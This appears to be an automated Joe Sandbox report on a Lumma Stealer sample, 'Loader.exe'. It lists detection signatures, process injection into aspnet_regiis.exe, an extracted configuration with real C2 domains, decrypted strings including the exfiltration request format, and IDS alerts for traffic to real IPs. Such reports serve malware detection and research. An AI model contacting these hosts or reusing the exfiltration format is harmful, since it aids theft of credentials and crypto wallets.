Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Loader.exe

Overview

General Information

Sample name:Loader.exe
Analysis ID:1581746
MD5:2ec18b257662dd107ae84263ecd2e5c1
SHA1:ce2efa8394c35b8da16428b10ece4a856c53dd1f
SHA256:539f0617a85a7a0773cf9e36d803c1a8ddf5c69dc003c80c1f3afac147b47554
Tags:exeuser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • Loader.exe (PID: 3496 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: 2EC18B257662DD107AE84263ECD2E5C1)
    • conhost.exe (PID: 2272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • aspnet_regiis.exe (PID: 5772 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["hummskitnj.buzz", "inherineau.buzz", "ingreem-eilish.biz", "screwamusresz.buzz", "scentniej.buzz", "rebuildeso.buzz", "cashfuzysao.buzz", "prisonyfork.buzz", "appliacnesot.buzz"], "Build id": "HpOoIh--5defa06fc6ab"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000003.00000003.2176809705.0000000003577000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: aspnet_regiis.exe PID: 5772JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
          Process Memory Space: aspnet_regiis.exe PID: 5772JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: aspnet_regiis.exe PID: 5772JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
              decrypted.binstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T22:05:05.268137+010020283713Unknown Traffic192.168.2.54970423.55.153.106443TCP
                2024-12-28T22:05:07.752125+010020283713Unknown Traffic192.168.2.549705172.67.157.254443TCP
                2024-12-28T22:05:09.767020+010020283713Unknown Traffic192.168.2.549706172.67.157.254443TCP
                2024-12-28T22:05:12.146215+010020283713Unknown Traffic192.168.2.549707172.67.157.254443TCP
                2024-12-28T22:05:14.544670+010020283713Unknown Traffic192.168.2.549708172.67.157.254443TCP
                2024-12-28T22:05:16.862818+010020283713Unknown Traffic192.168.2.549709172.67.157.254443TCP
                2024-12-28T22:05:19.402133+010020283713Unknown Traffic192.168.2.549710172.67.157.254443TCP
                2024-12-28T22:05:21.574600+010020283713Unknown Traffic192.168.2.549713172.67.157.254443TCP
                2024-12-28T22:05:23.705985+010020283713Unknown Traffic192.168.2.549716172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T22:05:08.524544+010020546531A Network Trojan was detected192.168.2.549705172.67.157.254443TCP
                2024-12-28T22:05:10.540001+010020546531A Network Trojan was detected192.168.2.549706172.67.157.254443TCP
                2024-12-28T22:05:24.619897+010020546531A Network Trojan was detected192.168.2.549716172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T22:05:08.524544+010020498361A Network Trojan was detected192.168.2.549705172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T22:05:10.540001+010020498121A Network Trojan was detected192.168.2.549706172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T22:05:03.048763+010020585721Domain Observed Used for C2 Detected192.168.2.5545201.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T22:05:03.188045+010020585761Domain Observed Used for C2 Detected192.168.2.5529931.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T22:05:03.427192+010020585781Domain Observed Used for C2 Detected192.168.2.5575641.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T22:05:02.740771+010020585801Domain Observed Used for C2 Detected192.168.2.5509011.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T22:05:02.286296+010020585841Domain Observed Used for C2 Detected192.168.2.5540971.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T22:05:02.454948+010020585861Domain Observed Used for C2 Detected192.168.2.5519531.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T22:05:02.599824+010020585881Domain Observed Used for C2 Detected192.168.2.5650861.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T22:05:02.884238+010020585901Domain Observed Used for C2 Detected192.168.2.5650251.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T22:05:20.182376+010020480941Malware Command and Control Activity Detected192.168.2.549710172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T22:05:06.050526+010028586661Domain Observed Used for C2 Detected192.168.2.54970423.55.153.106443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: https://lev-tolstoi.com/Sg5hAvira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/uoAvira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/s~Avira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/TAvira URL Cloud: Label: malware
                Found malware configuration
                Source: Loader.exeMalware Configuration Extractor: LummaC {"C2 url": ["hummskitnj.buzz", "inherineau.buzz", "ingreem-eilish.biz", "screwamusresz.buzz", "scentniej.buzz", "rebuildeso.buzz", "cashfuzysao.buzz", "prisonyfork.buzz", "appliacnesot.buzz"], "Build id": "HpOoIh--5defa06fc6ab"}
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\gdi32.dllReversingLabs: Detection: 63%
                Multi AV Scanner detection for submitted file
                Source: Loader.exeVirustotal: Detection: 48%Perma Link
                Source: Loader.exeReversingLabs: Detection: 70%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Roaming\gdi32.dllJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: Loader.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: Loader.exeString decryptor: hummskitnj.buzz
                Source: Loader.exeString decryptor: cashfuzysao.buzz
                Source: Loader.exeString decryptor: appliacnesot.buzz
                Source: Loader.exeString decryptor: screwamusresz.buzz
                Source: Loader.exeString decryptor: inherineau.buzz
                Source: Loader.exeString decryptor: scentniej.buzz
                Source: Loader.exeString decryptor: rebuildeso.buzz
                Source: Loader.exeString decryptor: prisonyfork.buzz
                Source: Loader.exeString decryptor: ingreem-eilish.biz
                Source: Loader.exeString decryptor: lid=%s&j=%s&ver=4.0
                Source: Loader.exeString decryptor: TeslaBrowser/5.5
                Source: Loader.exeString decryptor: - Screen Resoluton:
                Source: Loader.exeString decryptor: - Physical Installed Memory:
                Source: Loader.exeString decryptor: Workgroup: -
                Source: Loader.exeString decryptor: HpOoIh--5defa06fc6ab
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C457C0 CryptUnprotectData,3_2_72C457C0
                Source: Loader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49710 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49716 version: TLS 1.2
                Source: Loader.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE53460 FindFirstFileExW,0_2_6CE53460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then lea esi, dword ptr [eax+00000270h]3_2_72C38A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx3_2_72C51A10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h3_2_72C70340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_72C5D34A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, ebx3_2_72C38600
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-16h]3_2_72C71720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, ebx3_2_72C57440
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+09AD4080h]3_2_72C57440
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edi, dword ptr [esi+30h]3_2_72C3CC7A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-16h]3_2_72C70D20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_72C5AAC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ecx+ebx*8], 385488F2h3_2_72C6CA40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_72C66210
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then dec edx3_2_72C6FA20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]3_2_72C373D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]3_2_72C373D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h3_2_72C583D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-6E2DD57Fh]3_2_72C4EB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+0Ah]3_2_72C3AB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax3_2_72C4C300
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then dec edx3_2_72C6FB10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, ecx3_2_72C48B1B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then dec edx3_2_72C6FB2A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then dec edx3_2_72C6FB28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov esi, ecx3_2_72C590D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax3_2_72C4D8D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax3_2_72C4D8D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_72C5E0DA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_72C5C0E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, ecx3_2_72C4B8F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, ecx3_2_72C4B8F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_72C5C09E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, ebx3_2_72C4C8A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-000000BEh]3_2_72C4C8A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, byte ptr [esp+edx+0Ah]3_2_72C4C8A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-2E3D7ACEh]3_2_72C4C8A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax3_2_72C4D8AC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax3_2_72C4D8AC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edi], al3_2_72C5C850
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then push esi3_2_72C3C805
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h3_2_72C52830
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+04h]3_2_72C6C830
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h3_2_72C581CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h3_2_72C589E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edi], al3_2_72C5B980
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h3_2_72C6C990
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp edx3_2_72C539B9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [edx+eax]3_2_72C539B9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_72C5C09E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-16h]3_2_72C71160
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [72C76130h]3_2_72C48169
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h3_2_72C5B170
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax3_2_72C5D17D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax3_2_72C5D116
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-16h]3_2_72C706F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, ecx3_2_72C59E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx eax, byte ptr [ebp+edi+00000090h]3_2_72C32EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax3_2_72C52E6D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp edx3_2_72C52E6D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [edx+eax]3_2_72C52E6D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_72C5DE07
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then dec edx3_2_72C6FE00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp edx3_2_72C537D6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov dword ptr [esp+20h], eax3_2_72C39780
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]3_2_72C57740
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx3_2_72C46F52
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax3_2_72C5BF13
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edi, dword ptr [esp+28h]3_2_72C55F1B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp eax3_2_72C59739
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h3_2_72C44CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [eax+edi-74D5A7FEh]3_2_72C5C465
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_72C5C465
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx3_2_72C4747D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [edx], di3_2_72C4747D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [ebp+eax-46h]3_2_72C6EDC1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh3_2_72C6CDF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-3ECB279Fh]3_2_72C6CDF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh3_2_72C6CDF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 7F7BECC6h3_2_72C6CDF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_72C5DDFF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edi, ecx3_2_72C5A5B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then dec edx3_2_72C6FD70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax+61765397h]3_2_72C4B57D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, ecx3_2_72C56D2E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h3_2_72C58528

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2058588 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scentniej .buzz) : 192.168.2.5:65086 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058584 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (prisonyfork .buzz) : 192.168.2.5:54097 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058578 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hummskitnj .buzz) : 192.168.2.5:57564 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058576 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cashfuzysao .buzz) : 192.168.2.5:52993 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058580 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (inherineau .buzz) : 192.168.2.5:50901 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058586 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebuildeso .buzz) : 192.168.2.5:51953 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058572 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appliacnesot .buzz) : 192.168.2.5:54520 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058590 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (screwamusresz .buzz) : 192.168.2.5:65025 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49704 -> 23.55.153.106:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49706 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49706 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49710 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49705 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49716 -> 172.67.157.254:443
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: hummskitnj.buzz
                Source: Malware configuration extractorURLs: inherineau.buzz
                Source: Malware configuration extractorURLs: ingreem-eilish.biz
                Source: Malware configuration extractorURLs: screwamusresz.buzz
                Source: Malware configuration extractorURLs: scentniej.buzz
                Source: Malware configuration extractorURLs: rebuildeso.buzz
                Source: Malware configuration extractorURLs: cashfuzysao.buzz
                Source: Malware configuration extractorURLs: prisonyfork.buzz
                Source: Malware configuration extractorURLs: appliacnesot.buzz
                Source: Joe Sandbox ViewIP Address: 172.67.157.254 172.67.157.254
                Source: Joe Sandbox ViewIP Address: 23.55.153.106 23.55.153.106
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 23.55.153.106:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49713 -> 172.67.157.254:443
